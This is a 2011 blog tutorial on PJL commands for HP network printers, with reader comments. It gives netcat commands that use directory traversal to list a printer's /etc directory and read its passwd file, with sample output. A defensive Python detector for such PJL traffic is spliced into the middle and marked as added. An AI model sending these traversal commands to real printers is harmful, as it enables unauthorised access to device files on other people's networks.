Thursday, December 1, 2011

“Hacking” Printers - PJL Basics

Notice the quotes in the title? That’s because this particular write up is about knowing and understanding the basics. A long time ago, you became a “hacker” because you were someone who was an expert in a subject.
I know people that have forgotten more about VMS than I could ever learn. They became known as a VMS “hacker” because they knew everything that could be known about VMS.
A short while later in my career, I got to be known as the AIX “hacker” because I knew more about AIX than even some IBM techs I’d talk to on the phone. That’s why the term “Hacking” in the title has quotes. What we’re going to talk about today is understanding some very basic features that most people have forgotten about and being able to manipulate those features to help us do some bad stuff.

HP Printer Vulnerability
I’ve been surrounded by a lot of debate since the HP printer vulnerability controversy sparked up (like the pun?) earlier this week. If you’ve NOT been living with your head buried in the sand the past few days, then you’ve no doubt heard that security researchers have dug into some inherent functionality in HP printers and figured out a way to use it to do some things that could cause some alarm. HP has since officially argued that claims about burning printers are sensationalistic.
I’ve been personally dragged into a couple of misguided conversations regarding these new findings and there are a few things that I don’t think have been made crystal clear about the vulnerabilities. With that in mind, I figured we could take a few moments here at Hack On A Dime to refamiliarize ourselves with the basics of HP Printers and focus on what’s at the heart of the new research: PJL.
For those that are not familiar, PJL is very nearly the heart of communication with print queues. But, let’s not get ahead of ourselves.

Printer Communication

Printers are, in essence, simply computers. They communicate via the network, like PCs, but, unfortunately, they may be the most neglected devices on any network. A sampling of printers tested (later in this article) showed me that they hadn’t had firmware updates in well over a year. (This helped me greatly, because the vulnerability I ended up exploiting was found within that year, so I really shouldn’t complain.)
HP Printers have five main ways of communicating on the network, if they’re networked and using JetDirect:

  • HTTP
  • HTTPS
  • Telnet
  • SNMP
  • PCL / PJL

HTTP and HTTPS are served through what HP calls the Embedded Web Server, or EWS. Now, most administrators, when deploying HP printers, turn off HTTP in favor of HTTPS. Ok, maybe not most, but those that have an understanding about security know that HTTPS is better than HTTP, so they usually turn off communications on Port 80, in favor of Port 443 (HTTPS).

If an admin communicates with their printer through Telnet, the password is usually the same using Telnet, as it is using EWS. SNMP is a whole other discussion (and a whole other vulnerability discussion – did you know you can snmpwalk an HP printer without the community string? Yeah, we’ll talk about THAT later.).

But what’s interesting is PJL – the Printer Job Language – an extension of PCL (the Printer Command Language – how print jobs are communicated to printers) is another way to communicate with the printer and has some … INTERESTING features that help us, the hacker.

PJL, by the way, supports the ability to password protect it (with a separate password from EWS/Telnet) so you can actually protect the printing stream (a little). The following examples, however, were successfully implemented on an HP printer without a PJL password being set. But, let’s face facts, nearly 99.9% of the printers out there WILL NOT have the PJL password set.

So, let’s take a look at how we can use PJL to make the printer do some interesting things. NOTE: below, where [ESC] is used, you need to actually insert the ESCAPE character. I highly suggest you use Notepad++ in order to craft the ASCII commands. Regular Notepad just won’t cut it.  And, lastly, you should know that in order to send the commands to the printer, you’re going to use netcat.exe (or nc.exe). This will send the commands in a “raw”, unadulterated way so the printer will interpret the commands correctly.

First, if you want to try something easy out, you can tell the printer to change the “READY” message to something else.

The code to change the “READY” message to “Igor!!!!” is:

[ESC]%-12345X@PJL RDYMSG DISPLAY="Igor!!!!"

You can paste that code into Notepad++, substitute the [ESC] with the actual Escape character and save the file to a directory. In a Windows environment, you can open a DOS box and issue the “type” command to “echo” the file to netcat. For instance, if you had saved the file as “pjl1.txt”, you can do the following:

type pjl1.txt | nc -v -v <PRINTER IP ADDRESS> 9100

Linux folks can, of course, use “echo” to perform the same thing. Regardless, sending that code to the printer resulted in the printer’s display message reading:

Knowing that the printer accepts PJL code, we can now start to send it way more interesting code. Like what you ask? Well, thanks to a vulnerability associated with PJL code and directory traversal (you know, the practice of inserting periods and slashes into a pathname to traverse the directory structure and get to places you shouldn’t?) we can start to list out the contents of the hard drives that are installed in the printer.

In HP’s world, the main drive is called drive “0:” and the next drive is called drive “1:”. So, for you Windows folks, you have “C:” and the HP printers have “0:”. So, let’s go ahead and list out the “etc” directory.

This code lists out the contents of the ‘etc’ directory for me:

[ESC]%-12345X@PJL FSDIRLIST NAME="0:\\..\\..\\..\\etc" ENTRY=1 COUNT=999999

Save this file and “type” it out to netcat.

type pjl-fsdirlist.txt | nc -v -v <IP Address of Printer> 9100

And this was the output of the command:

[Fully Qualified Domain Name] [IP Address] 9100 (?) open
@PJL FSDIRLIST NAME="0:\\..\\..\\..\\etc" ENTRY=1
starttab TYPE=FILE SIZE=315
passwd TYPE=FILE SIZE=23
ttys TYPE=FILE SIZE=1357
hosts TYPE=FILE SIZE=159
resolv.conf TYPE=FILE SIZE=53
fsdev TYPE=FILE SIZE=681
fstab TYPE=FILE SIZE=247

Using the PJL commands to interact with the Filesystem is not a hack, it is a feature. However, it is a feature that we can use to view the contents of the hard drives and even the contents of the files. See that “passwd” file up there? Let’s see what’s in it.

This code (the FSUPLOAD command) allowed me to view the contents of the file by sending a print job to the printer.

[ESC]%-12345X@PJL FSUPLOAD NAME="0:\\..\\..\\..\\etc\passwd" OFFSET=0 SIZE=22000

The output of this command looked like this:

type pjl1.txt | nc -v -v <IP Address of Printer> 9100
Fully Qualified Domain Name [IP Address of Printer] 9100 (?) open
@PJL FSUPLOAD FORMAT:BINARY NAME="0:\\..\\..\\..\\etc\passwd" OFFSET=0 SIZE=23
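
Seen from the monitoring side, the jobs above are easy to recognise in raw traffic to port 9100. The following is an added example, not code from the original post: a small Python parser that walks a captured payload, pulls out each @PJL command, and flags ready-message changes, filesystem commands, and `..` components in a NAME argument. The function names, severity labels and the sample capture are assumptions made for this illustration.

```python
import re
from dataclasses import dataclass

UEL = b"\x1b%-12345X"  # the [ESC]%-12345X prefix used in the jobs above

# Filesystem commands from HP's PJL Technical Reference.
FS_COMMANDS = {"FSAPPEND", "FSDELETE", "FSDIRLIST", "FSDOWNLOAD",
               "FSINIT", "FSMKDIR", "FSQUERY", "FSUPLOAD"}
PJL_LINE = re.compile(r"^@PJL\s+([A-Z]+)\b(.*)$", re.IGNORECASE)
NAME_ARG = re.compile(r'NAME\s*=\s*"([^"]*)"', re.IGNORECASE)


@dataclass
class Finding:
    severity: str  # "high", "medium" or "low" (labels chosen for this example)
    command: str
    detail: str


def pjl_commands(payload: bytes):
    """Yield (command, arguments) for each @PJL line in a raw payload."""
    # The UEL sits directly in front of @PJL, so turn it into a line break.
    text = payload.replace(UEL, b"\n").decode("latin-1")
    for line in text.splitlines():
        m = PJL_LINE.match(line.strip())
        if m:
            yield m.group(1).upper(), m.group(2).strip()


def has_traversal(name: str) -> bool:
    """True if a path component is '..'; separators are backslash runs or '/'."""
    return ".." in re.split(r"[\\/]+", name)


def analyze(payload: bytes) -> list:
    """Return a Finding for every PJL command worth an analyst's attention."""
    findings = []
    for command, args in pjl_commands(payload):
        if command in FS_COMMANDS:
            m = NAME_ARG.search(args)
            name = m.group(1) if m else ""
            if has_traversal(name):
                findings.append(Finding("high", command, "path traversal in NAME=" + name))
            else:
                findings.append(Finding("medium", command, "filesystem access, NAME=" + name))
        elif command == "RDYMSG":
            findings.append(Finding("low", command, "ready message changed: " + args))
    return findings


# Constructed capture: the jobs shown on this page plus an empty JOB/EOJ pair.
SAMPLE = b"".join([
    UEL + rb'@PJL RDYMSG DISPLAY="Igor!!!!"' + b"\r\n",
    UEL + rb'@PJL FSDIRLIST NAME="0:\\..\\..\\..\\etc" ENTRY=1 COUNT=999999' + b"\r\n",
    UEL + rb'@PJL FSUPLOAD NAME="0:\\..\\..\\..\\etc\passwd" OFFSET=0 SIZE=22000' + b"\r\n",
    UEL + rb'@PJL FSMKDIR NAME="0:\pcl\macros"' + b"\r\n",
    UEL + b"@PJL JOB\r\n@PJL EOJ\r\n" + UEL,
])

if __name__ == "__main__":
    for f in analyze(SAMPLE):
        print(f"{f.severity:6} {f.command:10} {f.detail}")
```

Ordinary print jobs rarely carry filesystem commands, so even the "medium" findings are worth a look when they come from a workstation rather than a print server.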

Hopefully, this tutorial helps illustrate for you some basic PJL commands and how to use them to interact with the printers. If you want to learn more about PJL commands, go ahead and google “PJL reference manual”; you’ll get a number of hits listing out PDFs containing a ton of PJL commands you can use to mess around with the printers you find on networks you test.

Or, if you decide to really take the quick hacker highway, you can check out this script on attackvector that combines a lot of this stuff together in one Perl script.

Or, if you’re a Metasploit user, you can check out this module that also executes PJL queries.

The key thing to take away from this tutorial is this: the new security research may or may not be 100% accurate, but it should be a launching point for discussion and your expert knowledge in this subject should help you educate others who may not quite understand the claims that are being made regarding the vulnerability of HP Printers.



  2. Hi
    Kind of fun... I'm also in the middle of hacking a few HP printers.. actually on request to do so...
    Question: Can the FSDIRLIST be disabled in any way ??
    Reason being that although wanting to do just the listing of all the macros.. I do not get any output at all.. nor the listing of the "O:\pcl\macros" that I would like to...
    Any help is appreciated!

    1. According to this: there's no discussion regarding disabling the FSDIRLIST command. But enabling passwords for PJL will make it so you can't submit a PJL job with FSDIRLIST and have it execute (without the password). Any jobs submitted without the correct PJL password will look like they are working and then do absolutely nothing. It sounds to me that the target may have PJL passwords enabled. The behavior you describe sounds like it's protected that way.

    2. Hi
      Command is like this:
      @PJL COMMENT XRXbegin
      @PJL FSMKDIR NAME="0:\pcl\macros"
      @PJL FSDOWNLOAD FORMAT:BINARY NAME="0:\pcl\macros\15" SIZE=19800
      which works well for the download of macros.. but doing a FSDIRLIST on the same directory.... gives no output whatsoever!!
      I am really baffled by this....
      ideas will be appreciated!
      (Needless to say the FSDIRLIST is to make certain that the needed macros have been downloaded and to verify the download)




  6. Here's how you do that one, without downloading anything... Just paste into a command line, replacing "Printer IP" with your printer's IP.

    Note: Type in all caps.


    Telnet Printer IP 9100




  7. Do you know a hack for HP printers' region code locking? I have an HP PSC 1300 series lying wasted with me since 4 years because it was purchased in Europe and Indian cartridges don't work on it. I also have 4 brand new colour and black cartridges lying waste which I purchased hurriedly out here. Would really appreciate the help. Thanks in advance!


  10. So, how do you secure a printer against PJL/Telnet hacks? I set an admin passwd, disabled telnet, and added a PJL password#. Still, I can change the display via telnet. HP P3015.

  11. hi Drew,
    I tried the following command on one of our HP LaserJet printers, which I confirmed has no PJL password enabled. I did not get any response back and finally I had to use CTRL-C to quit.

    type cplock.pjl | nc -v -v 9100
    where cplock.pjl's content is as follows (i used ALT 027 to insert [esc])
    [ESC]%-12345X@PJL JOB
    @PJL EOJ


  17. @Admin

    Can You please guide me how i can install my HP 5000 Printer driver? Where can i download it?


  18. I am not sure about the idea of hacking a printer on how it helps consumers. All i want it to get cheap printer ink for my every day print usage.


  22. Does anybody know if there is another way to send PJL code to a printer without using NetCat? I would like to try to avoid using NetCat as it appears... sketchy. I have tried using the FTP interface already, but no luck. Any help would be greatly appreciated, as I have been trying to resolve this for days!

